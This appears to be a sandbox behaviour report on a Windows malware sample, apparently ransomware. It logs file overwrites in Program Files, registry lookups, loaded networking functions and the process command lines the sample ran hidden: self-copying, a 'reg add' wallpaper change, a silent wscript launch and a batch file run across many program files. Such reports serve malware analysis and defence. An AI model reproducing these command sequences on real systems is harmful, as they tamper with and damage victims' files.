|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\tzdb.dat | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\tzdb.dat | size = 16384 |
|
1 | |
| Write | C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe | size = 17800 |
|
1 | |
| Write | C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe | size = 61440 |
|
4 | |
| Write | C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\58.0.3029.110.manifest | size = 1642 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\default_apps\youtube.crx | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\default_apps\youtube.crx | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\cs.pak | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\cs.pak | size = 32768 |
|
1 | |
|
For performance reasons, the remaining 3986 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Registry (12)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Embarcadero\Locales | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Embarcadero\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\CodeGear\Locales | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\CodeGear\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Delphi\Locales | - |
|
2 |
Process (18)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\CIiHmnxMn6Ps\Desktop\CURRENT_DIRnwovkcyl.exe" "C:\Users\CIiHmnxMn6Ps\Desktop\NWYpDmnO.exe" | os_pid = 0x850, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\NWYpDmnO.exe" -n | os_pid = 0xb68, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_SHOW |
|
1 | |
| Create | "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\F7t5Hk0D.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f | os_pid = 0xf9c, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\MuA3C6WI.vbs" | os_pid = 0xfa4, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Microsoft Office 15\alfred.exe" | os_pid = 0x804, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui" | os_pid = 0x578, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Windows Journal\Templates\Genko_1.jtp" | os_pid = 0xa40, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" | os_pid = 0xec4, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Windows Journal\Journal.exe" | os_pid = 0xeac, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Windows Journal\Templates\Seyes.jtp" | os_pid = 0xe4c, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" | os_pid = 0xf04, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Windows Portable Devices\restaurant.exe" | os_pid = 0x974, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\MSBuild\expenditurevincenttablet.exe" | os_pid = 0xf4c, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui" | os_pid = 0xdfc, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Windows Journal\Templates\Memo.jtp" | os_pid = 0x5c0, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Windows Mail\wabmig.exe" | os_pid = 0x6e0, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" | os_pid = 0xbe0, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui" | os_pid = 0xcf0, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x75130000 |
|
1 | |
| Load | ws2_32.dll | base_address = 0x76ed0000 |
|
1 | |
| Get Handle | c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe | base_address = 0x400000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
6 | |
| Get Handle | c:\windows\syswow64\oleaut32.dll | base_address = 0x76ce0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\ole32.dll | base_address = 0x76f30000 |
|
1 | |
| Get Filename | c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe | process_name = c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\CURRENT_DIRnwovkcyl.exe, size = 522 |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\CURRENT_DIRnwovkcyl.exe, size = 261 |
|
12 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetThreadPreferredUILanguages, address_out = 0x751495e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadPreferredUILanguages, address_out = 0x75149a20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetThreadUILanguage, address_out = 0x7514d980 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetNativeSystemInfo, address_out = 0x7514a410 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDiskFreeSpaceExW, address_out = 0x751562d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7514a550 |
|
2 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantChangeTypeEx, address_out = 0x76cf7e70 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNeg, address_out = 0x76d40400 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNot, address_out = 0x76d41670 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAdd, address_out = 0x76d18460 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarSub, address_out = 0x76d19960 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMul, address_out = 0x76d19090 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDiv, address_out = 0x76d40910 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarIdiv, address_out = 0x76d412b0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMod, address_out = 0x76d41510 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAnd, address_out = 0x76d0f9d0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarOr, address_out = 0x76d41720 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarXor, address_out = 0x76d418c0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCmp, address_out = 0x76d04040 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarI4FromStr, address_out = 0x76d04b50 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR4FromStr, address_out = 0x76d0f4c0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR8FromStr, address_out = 0x76d11740 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDateFromStr, address_out = 0x76d05a80 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCyFromStr, address_out = 0x76d42e50 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBoolFromStr, address_out = 0x76d020d0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromCy, address_out = 0x76d05240 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromDate, address_out = 0x76d05420 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromBool, address_out = 0x76d02080 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoCreateInstanceEx, address_out = 0x7503baf0 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitializeEx, address_out = 0x74fdcd50 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoAddRefServerProcess, address_out = 0x7503d120 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoReleaseServerProcess, address_out = 0x75041970 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoResumeClassObjects, address_out = 0x75046640 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoSuspendClassObjects, address_out = 0x74fb1f60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeConditionVariable, address_out = 0x779e9da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeConditionVariable, address_out = 0x779f5860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeAllConditionVariable, address_out = 0x779f3370 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SleepConditionVariableCS, address_out = 0x74e62850 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAIoctl, address_out = 0x76eddca0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = __WSAFDIsSet, address_out = 0x76ee2f20 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = closesocket, address_out = 0x76ed9ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = ioctlsocket, address_out = 0x76edd860 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAGetLastError, address_out = 0x76ee38d0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAStartup, address_out = 0x76ee2420 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSACleanup, address_out = 0x76edda00 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = accept, address_out = 0x76ee4030 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = bind, address_out = 0x76ede0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = connect, address_out = 0x76ee33a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getpeername, address_out = 0x76ee12c0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getsockname, address_out = 0x76ede030 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getsockopt, address_out = 0x76ee1180 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = htonl, address_out = 0x76ee3670 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = htons, address_out = 0x76ee3650 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = inet_addr, address_out = 0x76ee2e90 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = inet_ntoa, address_out = 0x76ee4b00 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = listen, address_out = 0x76ee3f40 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = ntohl, address_out = 0x76ee3670 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = ntohs, address_out = 0x76ee3650 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = recv, address_out = 0x76edcff0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = recvfrom, address_out = 0x76ee4d60 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = select, address_out = 0x76ee48e0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = send, address_out = 0x76edce20 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = sendto, address_out = 0x76ee15a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = setsockopt, address_out = 0x76ed9560 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = shutdown, address_out = 0x76ee14e0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = socket, address_out = 0x76ed9780 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostbyaddr, address_out = 0x76efc600 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostbyname, address_out = 0x76efc790 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getprotobyname, address_out = 0x76efb6d0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getprotobynumber, address_out = 0x76efb820 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getservbyname, address_out = 0x76efcad0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getservbyport, address_out = 0x76efccb0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostname, address_out = 0x76efc920 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getaddrinfo, address_out = 0x76ed52b0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = freeaddrinfo, address_out = 0x76ed4b00 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getnameinfo, address_out = 0x76ee16a0 |
|
1 |
System (2712)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = LHNIWSJ |
|
1 | |
| Sleep | duration = 0 milliseconds (0.000 seconds) |
|
9 | |
| Sleep | duration = 1 milliseconds (0.001 seconds) |
|
4 | |
| Sleep | duration = 25 milliseconds (0.025 seconds) |
|
13 | |
| Sleep | duration = 1500 milliseconds (1.500 seconds) |
|
56 | |
| Sleep | duration = -1 (infinite) |
|
1 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
15 | |
| Get Time | type = Ticks, time = 121250 |
|
2 | |
| Get Time | type = Local Time, time = 2018-10-03 13:04:50 (Local Time) |
|
4 | |
| Get Time | type = Ticks, time = 121265 |
|
1 | |
| Get Time | type = Ticks, time = 121296 |
|
1 | |
| Get Time | type = Ticks, time = 130765 |
|
2 | |
| Get Time | type = Local Time, time = 2018-10-03 13:04:59 (Local Time) |
|
4 | |
| Get Time | type = Ticks, time = 130875 |
|
2 | |
| Get Time | type = Local Time, time = 2018-10-03 13:05:00 (Local Time) |
|
8 | |
| Get Time | type = Ticks, time = 130937 |
|
2 | |
| Get Time | type = Ticks, time = 243343 |
|
1 | |
| Get Time | type = Ticks, time = 243359 |
|
2 | |
| Get Time | type = Ticks, time = 243375 |
|
1 | |
| Get Time | type = Ticks, time = 243546 |
|
1 | |
| Get Time | type = Ticks, time = 247484 |
|
14 | |
| Get Time | type = Ticks, time = 247812 |
|
1 | |
| Get Time | type = Ticks, time = 247937 |
|
17 | |
| Get Time | type = Ticks, time = 247953 |
|
9 | |
| Get Time | type = Ticks, time = 248031 |
|
8 | |
| Get Time | type = Ticks, time = 248046 |
|
14 | |
| Get Time | type = Ticks, time = 249000 |
|
14 | |
| Get Time | type = Ticks, time = 250625 |
|
37 | |
| Get Time | type = Ticks, time = 250640 |
|
11 | |
| Get Time | type = Ticks, time = 250828 |
|
3 | |
| Get Time | type = Ticks, time = 250843 |
|
11 | |
| Get Time | type = Ticks, time = 250859 |
|
4 | |
| Get Time | type = Ticks, time = 250890 |
|
1 | |
| Get Time | type = Ticks, time = 250906 |
|
9 | |
| Get Time | type = Ticks, time = 251109 |
|
8 | |
| Get Time | type = Ticks, time = 251265 |
|
16 | |
| Get Time | type = Ticks, time = 251281 |
|
32 | |
| Get Time | type = Ticks, time = 253203 |
|
2 | |
| Get Time | type = Ticks, time = 253218 |
|
4 | |
| Get Time | type = Ticks, time = 253625 |
|
12 | |
| Get Time | type = Ticks, time = 255265 |
|
2 | |
| Get Time | type = Ticks, time = 255359 |
|
18 | |
| Get Time | type = Ticks, time = 255375 |
|
31 | |
| Get Time | type = Ticks, time = 255390 |
|
5 | |
| Get Time | type = Ticks, time = 255687 |
|
10 | |
| Get Time | type = Ticks, time = 255843 |
|
10 | |
| Get Time | type = Ticks, time = 255937 |
|
18 | |
| Get Time | type = Ticks, time = 256859 |
|
12 | |
| Get Time | type = Ticks, time = 256875 |
|
30 | |
| Get Time | type = Ticks, time = 258390 |
|
2 | |
| Get Time | type = Ticks, time = 258953 |
|
4 | |
| Get Time | type = Ticks, time = 259796 |
|
2 | |
| Get Time | type = Ticks, time = 260250 |
|
4 | |
| Get Time | type = Ticks, time = 260484 |
|
2 | |
| Get Time | type = Ticks, time = 261015 |
|
6 | |
| Get Time | type = Ticks, time = 262625 |
|
2 | |
| Get Time | type = Ticks, time = 262703 |
|
5 | |
| Get Time | type = Ticks, time = 262718 |
|
3 | |
| Get Time | type = Ticks, time = 262953 |
|
2 | |
| Get Time | type = Ticks, time = 263093 |
|
26 | |
| Get Time | type = Ticks, time = 263109 |
|
8 | |
| Get Time | type = Ticks, time = 263968 |
|
8 | |
| Get Time | type = Ticks, time = 265453 |
|
14 | |
| Get Time | type = Ticks, time = 267265 |
|
23 | |
| Get Time | type = Ticks, time = 267281 |
|
39 | |
| Get Time | type = Ticks, time = 267296 |
|
2 | |
| Get Time | type = Ticks, time = 267343 |
|
2 | |
| Get Time | type = Ticks, time = 267765 |
|
18 | |
| Get Time | type = Ticks, time = 267781 |
|
4 | |
| Get Time | type = Ticks, time = 267984 |
|
10 | |
| Get Time | type = Ticks, time = 268031 |
|
14 | |
| Get Time | type = Ticks, time = 268640 |
|
4 | |
| Get Time | type = Ticks, time = 268656 |
|
6 | |
| Get Time | type = Ticks, time = 268734 |
|
8 | |
| Get Time | type = Ticks, time = 268890 |
|
6 | |
| Get Time | type = Ticks, time = 290250 |
|
6 | |
| Get Time | type = Ticks, time = 305343 |
|
10 | |
| Get Time | type = Ticks, time = 305359 |
|
10 | |
| Get Time | type = Ticks, time = 310296 |
|
11 | |
| Get Time | type = Ticks, time = 313140 |
|
5 | |
| Get Time | type = Ticks, time = 313921 |
|
6 | |
| Get Time | type = Ticks, time = 313937 |
|
1 | |
| Get Time | type = Ticks, time = 314750 |
|
1 | |
| Get Time | type = Ticks, time = 314765 |
|
6 | |
| Get Time | type = Ticks, time = 315046 |
|
1 | |
| Get Time | type = Ticks, time = 315062 |
|
1 | |
| Get Time | type = Ticks, time = 315125 |
|
2 | |
| Get Time | type = Ticks, time = 316093 |
|
2 | |
| Get Time | type = Ticks, time = 316109 |
|
16 | |
| Get Time | type = Ticks, time = 316125 |
|
20 | |
| Get Time | type = Ticks, time = 316140 |
|
2 | |
| Get Time | type = Ticks, time = 316218 |
|
1 | |
| Get Time | type = Ticks, time = 316234 |
|
8 | |
| Get Time | type = Ticks, time = 316265 |
|
20 | |
| Get Time | type = Ticks, time = 316281 |
|
2 | |
| Get Time | type = Ticks, time = 316453 |
|
13 | |
| Get Time | type = Ticks, time = 316500 |
|
9 | |
| Get Time | type = Ticks, time = 316625 |
|
2 | |
| Get Time | type = Ticks, time = 316812 |
|
9 | |
| Get Time | type = Ticks, time = 316828 |
|
5 | |
| Get Time | type = Ticks, time = 318671 |
|
10 | |
| Get Time | type = Ticks, time = 318750 |
|
10 | |
| Get Time | type = Ticks, time = 318843 |
|
2 | |
| Get Time | type = Ticks, time = 319062 |
|
8 | |
| Get Time | type = Ticks, time = 319078 |
|
7 | |
| Get Time | type = Ticks, time = 319265 |
|
4 | |
| Get Time | type = Ticks, time = 319281 |
|
22 | |
| Get Time | type = Ticks, time = 319296 |
|
15 | |
| Get Time | type = Ticks, time = 319421 |
|
12 | |
| Get Time | type = Ticks, time = 319437 |
|
6 | |
| Get Time | type = Ticks, time = 319453 |
|
3 | |
| Get Time | type = Ticks, time = 319468 |
|
3 | |
| Get Time | type = Ticks, time = 320984 |
|
2 | |
| Get Time | type = Ticks, time = 321093 |
|
2 | |
| Get Time | type = Ticks, time = 321109 |
|
34 | |
| Get Time | type = Ticks, time = 321234 |
|
4 | |
| Get Time | type = Ticks, time = 321250 |
|
36 | |
| Get Time | type = Ticks, time = 321265 |
|
4 | |
| Get Time | type = Ticks, time = 323812 |
|
8 | |
| Get Time | type = Ticks, time = 323828 |
|
40 | |
| Get Time | type = Ticks, time = 323843 |
|
18 | |
| Get Time | type = Ticks, time = 325359 |
|
1 | |
| Get Time | type = Ticks, time = 325953 |
|
32 | |
| Get Time | type = Ticks, time = 327640 |
|
6 | |
| Get Time | type = Ticks, time = 327656 |
|
30 | |
| Get Time | type = Ticks, time = 327671 |
|
32 | |
| Get Time | type = Ticks, time = 327687 |
|
10 | |
| Get Time | type = Ticks, time = 329296 |
|
12 | |
| Get Time | type = Ticks, time = 329312 |
|
12 | |
| Get Time | type = Ticks, time = 329500 |
|
12 | |
| Get Time | type = Ticks, time = 329515 |
|
20 | |
| Get Time | type = Ticks, time = 329531 |
|
14 | |
| Get Time | type = Ticks, time = 329578 |
|
3 | |
| Get Time | type = Ticks, time = 329593 |
|
19 | |
| Get Time | type = Ticks, time = 331125 |
|
1 | |
| Get Time | type = Ticks, time = 331140 |
|
8 | |
| Get Time | type = Ticks, time = 331156 |
|
12 | |
| Get Time | type = Ticks, time = 331406 |
|
30 | |
| Get Time | type = Ticks, time = 331421 |
|
34 | |
| Get Time | type = Ticks, time = 331437 |
|
40 | |
| Get Time | type = Ticks, time = 331500 |
|
11 | |
| Get Time | type = Ticks, time = 331515 |
|
17 | |
| Get Time | type = Ticks, time = 331531 |
|
24 | |
| Get Time | type = Ticks, time = 331546 |
|
28 | |
| Get Time | type = Ticks, time = 333062 |
|
2 | |
| Get Time | type = Ticks, time = 333265 |
|
8 | |
| Get Time | type = Ticks, time = 333281 |
|
4 | |
| Get Time | type = Ticks, time = 333296 |
|
13 | |
| Get Time | type = Ticks, time = 333312 |
|
11 | |
| Get Time | type = Ticks, time = 333328 |
|
24 | |
| Get Time | type = Ticks, time = 333343 |
|
22 | |
| Get Time | type = Ticks, time = 333406 |
|
18 | |
| Get Time | type = Ticks, time = 333421 |
|
24 | |
| Get Time | type = Ticks, time = 333562 |
|
16 | |
| Get Time | type = Ticks, time = 333578 |
|
34 | |
| Get Time | type = Ticks, time = 333593 |
|
32 | |
| Get Time | type = Ticks, time = 335171 |
|
2 | |
| Get Time | type = Ticks, time = 335187 |
|
14 | |
| Get Time | type = Ticks, time = 335250 |
|
24 | |
| Get Time | type = Ticks, time = 335578 |
|
12 | |
| Get Time | type = Ticks, time = 335593 |
|
14 | |
| Get Time | type = Ticks, time = 335609 |
|
36 | |
| Get Time | type = Ticks, time = 335765 |
|
38 | |
| Get Time | type = Ticks, time = 335781 |
|
26 | |
| Get Time | type = Ticks, time = 335796 |
|
14 | |
| Get Time | type = Ticks, time = 335812 |
|
18 | |
| Get Time | type = Ticks, time = 336718 |
|
16 | |
| Get Time | type = Ticks, time = 338250 |
|
10 | |
| Get Time | type = Ticks, time = 338265 |
|
9 | |
| Get Time | type = Ticks, time = 338281 |
|
20 | |
| Get Time | type = Ticks, time = 338312 |
|
12 | |
| Get Time | type = Ticks, time = 338328 |
|
14 | |
| Get Time | type = Ticks, time = 338343 |
|
9 | |
| Get Time | type = Ticks, time = 338359 |
|
7 | |
| Get Time | type = Ticks, time = 338531 |
|
11 | |
| Get Time | type = Ticks, time = 338984 |
|
9 | |
| Get Time | type = Ticks, time = 339484 |
|
4 | |
| Get Time | type = Ticks, time = 339500 |
|
17 | |
| Get Time | type = Ticks, time = 339515 |
|
5 | |
| Get Time | type = Ticks, time = 341031 |
|
28 | |
| Get Time | type = Ticks, time = 341484 |
|
2 | |
| Get Time | type = Ticks, time = 341531 |
|
12 | |
| Get Time | type = Ticks, time = 341546 |
|
10 | |
| Get Time | type = Ticks, time = 341562 |
|
12 | |
| Get Time | type = Ticks, time = 341734 |
|
3 | |
| Get Time | type = Ticks, time = 341750 |
|
5 | |
| Get Time | type = Ticks, time = 341765 |
|
28 | |
| Get Time | type = Ticks, time = 341781 |
|
14 | |
| Get Time | type = Ticks, time = 341859 |
|
20 | |
| Get Time | type = Ticks, time = 341875 |
|
29 | |
| Get Time | type = Ticks, time = 341890 |
|
1 | |
| Get Time | type = Ticks, time = 343406 |
|
2 | |
| Get Time | type = Ticks, time = 344000 |
|
18 | |
| Get Time | type = Ticks, time = 344015 |
|
28 | |
| Get Time | type = Ticks, time = 344031 |
|
22 | |
| Get Time | type = Ticks, time = 344062 |
|
8 | |
| Get Time | type = Ticks, time = 344593 |
|
2 | |
| Get Time | type = Ticks, time = 344703 |
|
1 | |
| Get Time | type = Ticks, time = 344718 |
|
6 | |
| Get Time | type = Ticks, time = 344734 |
|
32 | |
| Get Time | type = Ticks, time = 344750 |
|
22 | |
| Get Time | type = Ticks, time = 344765 |
|
12 | |
| Get Time | type = Ticks, time = 346281 |
|
4 | |
| Get Time | type = Ticks, time = 346296 |
|
28 | |
